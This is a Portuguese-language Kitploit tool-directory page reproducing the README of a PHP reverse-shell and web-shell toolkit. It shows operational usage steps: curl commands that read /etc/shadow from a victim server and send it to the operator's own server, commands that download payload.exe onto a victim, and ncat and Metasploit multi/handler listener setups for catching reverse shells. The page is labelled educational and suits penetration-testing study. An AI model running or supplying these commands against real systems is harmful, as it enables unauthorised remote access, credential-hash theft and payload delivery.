Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
php-reverse-shell — Shells PHP que funcionam em Linux, macOS e Windows. | Kitploit
Ferramentas/GitHubGitHub/ivan-sincek/php-reverse-shell
ExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

Shells PHP que funcionam em Linux, macOS e Windows.

Ver Repositório
571160há 5 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PHP Reverse Shell

Apenas uma pequena atualização do popular script de reverse shell em PHP pentestmonkey/php-reverse-shell. Créditos ao autor original!

Funciona em sistemas Linux e macOS com /bin/sh e em sistemas Windows com cmd.exe. O script detectará automaticamente o sistema operacional subjacente.

Funciona tanto com ncat quanto com multi/handler.

Testado em:

  • XAMPP para Linux v7.3.19 com PHP v7.3.19 no Kali Linux v2020.2 (64 bits),
  • XAMPP para OS X v7.4.10 com PHP v7.4.10 no macOS Catalina v10.15.6 (64 bits),
  • XAMPP para Windows v7.4.3 com PHP v7.4.3 no Windows 10 Enterprise OS (64 bits),
  • Imagem Docker nouphet/docker-php4 com PHP v4.4.0,
  • Imagem Docker steeze/php52-nginx com PHP v5.2.17.

Os pipes de processo no Windows OS não suportam operações assíncronas, portanto stream_set_blocking(), stream_select() e feof() não funcionarão corretamente, mas encontrei uma solução alternativa.

Feito para fins educacionais. Espero que ajude!

Índice

  • Reverse Shells
  • Web Shells
  • Script de Upload/Download de Arquivos
    • Caso 1: Enviar o Script para o Servidor da Vítima
    • Caso 2: Enviar o Script para o Seu Servidor
  • Configurar um Listener
  • Imagens

Reverse Shells

/src/reverse/php_reverse_shell.php requer PHP v5.0.0 ou superior.

/src/reverse/php_reverse_shell_older.php requer PHP v4.3.0 ou superior.

Altere o endereço IP e o número da porta dentro dos scripts conforme necessário.

Copie /src/reverse/php_reverse_shell.php para o diretório raiz da web do seu servidor (por exemplo, para /opt/lampp/htdocs/ no XAMPP) ou envie-o para o servidor web do seu alvo.

Navegue até o arquivo com o seu navegador web preferido.

Web Shells

Confira o simple PHP web shell baseado em requisição HTTP POST.

Confira o simple PHP web shell baseado em requisição HTTP GET. Você deve codificar na URL os seus comandos.

Confira o simple PHP web shell v2 baseado em requisição HTTP GET. Você deve codificar na URL os seus comandos.

Script de Upload/Download de Arquivos

Confira o script simples de upload/download de arquivos em PHP baseado em requisição HTTP POST para upload de arquivos e HTTP GET para download de arquivos.

Ao baixar um arquivo, você deve codificar na URL o caminho do arquivo.

Dependendo da configuração do servidor, baixar um arquivo por meio do parâmetro de requisição HTTP GET pode nem sempre funcionar; nesse caso, você terá que definir o caminho do arquivo diretamente no script.

Caso 1: Enviar o Script para o Servidor da Vítima

Navegue até o script no servidor web da vítima com o seu navegador web preferido ou use o cURL do seu PC.

Envie um arquivo para o diretório raiz da web do servidor a partir do seu PC:

root@kitploit:~
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

Baixe um arquivo do servidor para o seu PC:

root@kitploit:~
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

Se você elevou seus privilégios iniciais dentro do seu reverse shell, este script pode não ter os mesmos privilégios que o shell. Nesse caso, para baixar um determinado arquivo, você pode precisar copiar o arquivo para o diretório raiz da web e definir as permissões de leitura necessárias.

Caso 2: Enviar o Script para o Seu Servidor

A partir do seu PHP reverse shell, execute os seguintes comandos cURL.

Envie um arquivo do PC da vítima para o diretório raiz da web do seu servidor:

root@kitploit:~
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

Baixe um arquivo do diretório raiz da web do seu servidor para o PC da vítima:

root@kitploit:~
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

Configurar um Listener

Para configurar um listener, abra seu console preferido no Kali Linux e execute um dos exemplos abaixo.

Configure o listener ncat:

root@kitploit:~
ncat -nvlp 9000

Configure o listener multi/handler:

root@kitploit:~
msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Imagens

Ncat

Figura 1 - Ncat

Script Dump

Figura 2 - Dump do Script

Baixar ferramenta